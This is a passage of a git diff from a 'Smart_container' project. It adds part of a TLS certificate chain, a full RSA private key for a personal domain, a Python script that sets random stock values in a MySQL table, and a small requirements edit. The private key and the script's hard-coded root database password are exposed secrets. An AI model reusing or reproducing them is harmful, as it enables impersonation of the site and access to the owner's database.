+TnBfcgCVE+6hKN7uUYM78bqdK9EvEkR6QjpKmNWpYakVESEmG3SVY7t6kSYLN9Yy +7Ee0Fh0CpxkwYKdNfIc5+XTUKU1kxRLct3QVJTEpu6i/AgMBAAGjggMLMIIDBzAf +BgNVHSMEGDAWgBR/05nzoEcOMQBWViKOt8ye3coBijAdBgNVHQ4EFgQUphGL8J1s +l6FYzSDKtCQFjv3F9aMwMwYDVR0RBCwwKoIRdGhvbWFzLXlhbnhpbi5jb22CFXd3 +dy50aG9tYXMteWFueGluLmNvbTAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYI +KwYBBQUHAwEGCCsGAQUFBwMCMD4GA1UdIAQ3MDUwMwYGZ4EMAQIBMCkwJwYIKwYB +BQUHAgEWG2h0dHA6Ly93d3cuZGlnaWNlcnQuY29tL0NQUzCBkgYIKwYBBQUHAQEE +gYUwgYIwNAYIKwYBBQUHMAGGKGh0dHA6Ly9zdGF0dXNlLmRpZ2l0YWxjZXJ0dmFs +aWRhdGlvbi5jb20wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jYWNlcnRzLmRpZ2l0YWxj +ZXJ0dmFsaWRhdGlvbi5jb20vVHJ1c3RBc2lhVExTUlNBQ0EuY3J0MAkGA1UdEwQC +MAAwggF/BgorBgEEAdZ5AgQCBIIBbwSCAWsBaQB3ACl5vvCeOTkh8FZzn2Old+W+ +V32cYAr4+U1dJlwlXceEAAABfP9uAGoAAAQDAEgwRgIhAL8uti2SpGNt1gWZLa7u +PBpvR6tXmjji+5GR6B3cM5/lAiEAp7P+6jR8S3jWeqpoQJDzicOhgoAt7mu+kFol +U0/yHgkAdgBRo7D1/QF5nFZtuDd4jwykeswbJ8v3nohCmg3+1IsF5QAAAXz/bgBa +AAAEAwBHMEUCIHwZkmDH6XvhFS4r5vim7rnqpY13h+eD4NJgFLIPS6X8AiEAgaDM +7C4Wpvo+RUupJ9SAj52+nzH7z+DhQMT1pHQ43vgAdgBByMqx3yJGShDGoToJQode +TjGLGwPr60vHaPCQYpYG9gAAAXz/bf/gAAAEAwBHMEUCIGmOVzmDLsfW5GP1DO7n +jSkVtHsdt8YcmzaIrdRap9OiAiEArA1cnJycQ7oYgx52ifcBn/nUU5ma2avKEIug +gzjGHTAwDQYJKoZIhvcNAQELBQADggEBAGB4OuZsjwxwtRDiBWeCUFtvKx52rTr/ +EAUtgX4/LlywjN8EyNvZ1tOP62bKSmzKVp1kq6RosQqLWgZI12Pk+THi7UyIxHe7 +05HM9GtyI5anWBrrcWikCaRQ+u8hO0VIx8Ey2Pw7HES7dUBFm9lt2lhRhqTRiCZv +HIDdVM00vEtLoZzSp0KUoFJ7HCIzfwn04yVBhHyC7cEAXkcKGRoS8rrXNPROwmSu +l34uJZiXIvCeFLrgH2JsoHJOlWS3H4nKyYzpBatsxaf6bkcmXXj1Aec9viGmC6/D +obgNL0oOR7TVaUdZI8SmsNuq2t7/b0LoxFdvlpVz3TnFkwdLSQq5ojM= +-----END CERTIFICATE----- +-----BEGIN CERTIFICATE----- +MIIErjCCA5agAwIBAgIQBYAmfwbylVM0jhwYWl7uLjANBgkqhkiG9w0BAQsFADBh +MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBD +QTAeFw0xNzEyMDgxMjI4MjZaFw0yNzEyMDgxMjI4MjZaMHIxCzAJBgNVBAYTAkNO +MSUwIwYDVQQKExxUcnVzdEFzaWEgVGVjaG5vbG9naWVzLCBJbmMuMR0wGwYDVQQL +ExREb21haW4gVmFsaWRhdGVkIFNTTDEdMBsGA1UEAxMUVHJ1c3RBc2lhIFRMUyBS +U0EgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCgWa9X+ph+wAm8 +Yh1Fk1MjKbQ5QwBOOKVaZR/OfCh+F6f93u7vZHGcUU/lvVGgUQnbzJhR1UV2epJa +e+m7cxnXIKdD0/VS9btAgwJszGFvwoqXeaCqFoP71wPmXjjUwLT70+qvX4hdyYfO +JcjeTz5QKtg8zQwxaK9x4JT9CoOmoVdVhEBAiD3DwR5fFgOHDwwGxdJWVBvktnoA +zjdTLXDdbSVC5jZ0u8oq9BiTDv7jAlsB5F8aZgvSZDOQeFrwaOTbKWSEInEhnchK +ZTD1dz6aBlk1xGEI5PZWAnVAba/ofH33ktymaTDsE6xRDnW97pDkimCRak6CEbfe +3dXw6OV5AgMBAAGjggFPMIIBSzAdBgNVHQ4EFgQUf9OZ86BHDjEAVlYijrfMnt3K +AYowHwYDVR0jBBgwFoAUA95QNVbRTLtm8KPiGxvDl7I90VUwDgYDVR0PAQH/BAQD +AgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjASBgNVHRMBAf8ECDAG +AQH/AgEAMDQGCCsGAQUFBwEBBCgwJjAkBggrBgEFBQcwAYYYaHR0cDovL29jc3Au +ZGlnaWNlcnQuY29tMEIGA1UdHwQ7MDkwN6A1oDOGMWh0dHA6Ly9jcmwzLmRpZ2lj +ZXJ0LmNvbS9EaWdpQ2VydEdsb2JhbFJvb3RDQS5jcmwwTAYDVR0gBEUwQzA3Bglg +hkgBhv1sAQIwKjAoBggrBgEFBQcCARYcaHR0cHM6Ly93d3cuZGlnaWNlcnQuY29t +L0NQUzAIBgZngQwBAgEwDQYJKoZIhvcNAQELBQADggEBAK3dVOj5dlv4MzK2i233 +lDYvyJ3slFY2X2HKTYGte8nbK6i5/fsDImMYihAkp6VaNY/en8WZ5qcrQPVLuJrJ +DSXT04NnMeZOQDUoj/NHAmdfCBB/h1bZ5OGK6Sf1h5Yx/5wR4f3TUoPgGlnU7EuP +ISLNdMRiDrXntcImDAiRvkh5GJuH4YCVE6XEntqaNIgGkRwxKSgnU3Id3iuFbW9F +UQ9Qqtb1GX91AJ7i4153TikGgYCdwYkBURD8gSVe8OAco6IfZOYt/TEwii1Ivi1C +qnuUlWpsF1LdQNIdfbW3TSe0BhQa7ifbVIfvPWHYOu3rkg1ZeMo6XRU9B4n5VyJY +RmE= +-----END CERTIFICATE----- diff --git a/Smart_container/ssl/2_thomas-yanxin.com.key b/Smart_container/ssl/2_thomas-yanxin.com.key new file mode 100644 index 0000000..289ba23 --- /dev/null +++ b/Smart_container/ssl/2_thomas-yanxin.com.key @@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEowIBAAKCAQEAn1lgreeR0n4sAatfx+0WcYDBxKNQzfmbKQRqtbO8rgXhV0Cp +cy5XwUq8Go7mMjGS0u8k/1GRiGyUHutg1rHSWLE7dDCAoAjygLANSGt9U4IbW96q +CPOlH9rXPSYBxC8ivUcsU2WWJnk/yiGHDaeS7e1v9AEqykpT8UOJcYUlVCIu8cpg +AxEe/+FJZlWnTuMbaDZORuLYzYGkCGZ1cOknjg1zVMRedS3Is6KvpOwIC05wX3IA +lRPuoSje7lGDO/G6nSvRLxJEekI6SpjVqWGpFREhJht0lWO7epEmCzfWMuxHtBYd +AqcZMGCnTXyHOfl01ClNZMUS3Ld0FSUxKbuovwIDAQABAoIBAAvKj9Jeg9ZZGsWG +2mAPZa1Bc1UrJpQPR9F5r7HBWpFgAwQzVzacM8csUg3/C/6j13L/WjQAY63+JtnA +3hoU73U7rCQVYLc24kbugBUfSxdOVdru95MRAGOCjJHMSa4sNLxf02JabolrSHKb +F4TFpSQxAStDmNh+NobwUe/SA+idPv/vs1D9VmIhYdlumwc4A2zZoxsLtC22ujqo +EBXXUUBS4NBj4EPSh5G/0I0cOg7TbGPrnk7TsTDAbyhdzJxdw7qep+xbeRHe3IUe +qol3Ds5FDRMjd9jlbnCkmkPvmlTM5V/MrriuxTmFLgflOPasQpHWgzjdhnV3vbmg ++FlXIY0CgYEA1Ra7PMV3ZKfiLQD9TDI3lipS7f+NSvYy6KUWFKdTO5XNkemhJG6a +CwBydh0M+uxlSsVSQuIxAg/auNhe9tiU9NGuBb7forZ8q35f9ZrUUlK4UUcMDAAR +NfyiN+JGj1hDte7pB5vAXF7rENpvq4C9Ecav4kwkcbBVFgWvCwaSolMCgYEAv3A6 +6aoMGhQESQnqxKV4acW1+tyGnAut3FWZjqPEegsxpYqrQW6bzAs4Vp8VcP6hm0Ae +Tbx+dz9DwQ7nA+TBMtYpK/ZQRtgSm+qyrWzhheHlWCmRzEhJ32n6EtihjSXRZHeM +Bf6kwZtNi2mdMNMre03R1i9dztzSHIegEIfAKmUCgYEAyM7jJCHyoaiUPFTyXxvz +xk+cVyy8uifJUfRBGrWUelJxp0/Dy9Fu2W9Sbnxx/wVHb28EVoNSK99E/2zoETeJ +KC1xEXkOxwex9OrjA1ElRW8uw2lwsN5fWcD6Hi/ezrcfGBRNBh6A6IuKehdfpP9t +LZNPrLKUpY7GoDo6+uj2xoECgYAz7kvs6vYRdPCcp5YJ9iEuADYXcQ8K8ZgeNxJK +wV4hBTxYfb9rJogY18pWpRz54/kO1lviFonv6zeD/Xjpc3p9Qd81T8IDFcYmiYoi +xXCAEwFV4yDr24g+lM8DocRhN6sPp+ZSEfu7kVd9xA6iGgankjqj8YFvBjPxDVF8 +anbUiQKBgHokybzgfFSAGfg6RJ8WcHwdgF03NPnky4HGYyhywqXD1jq0UZiRH5Tz +pIfTm6PIR2fZRGD5PUPYY3U/UaGPiLljsCkbM2Dq0fe3cg9J8OdSk+LZbz9xXCvI +yAsuGc3RD5Z3QobMgBRxCJdq/c1b4lnjiiwNdNtBt2cJ9RE7QJXO +-----END RSA PRIVATE KEY----- \ No newline at end of file diff --git a/Smart_container/stock_up.py b/Smart_container/stock_up.py new file mode 100644 index 0000000..d59b180 --- /dev/null +++ b/Smart_container/stock_up.py @@ -0,0 +1,21 @@ +import pymysql +import random + +db = pymysql.connect(host="localhost", user="root", passwd="105316", db="container") +print('数据库连接成功!') +cur = db.cursor() +sql = "select * from t_container" +cur.execute(sql) +result=cur.fetchall() +for row in result: + sqlQuery = "UPDATE t_container SET stock = %s WHERE number = %s" + value = (random.randint(1000, 5000), row[0]) + cur.execute(sqlQuery, value) + + +db.commit() +cur.close() +db.close() + +print("============") +print("Done! ") \ No newline at end of file diff --git a/requirements.txt b/requirements.txt index 0177005..3c1741e 100644 --- a/requirements.txt +++ b/requirements.txt @@ -18,5 +18,4 @@ setuptools==45.2.0 six==1.14.0 tqdm==4.62.3 visualdl==2.2.0 -xpinyin==0.7.6 -qpt>=1.0a7 +xpinyin==0.7.6 \ No newline at end of file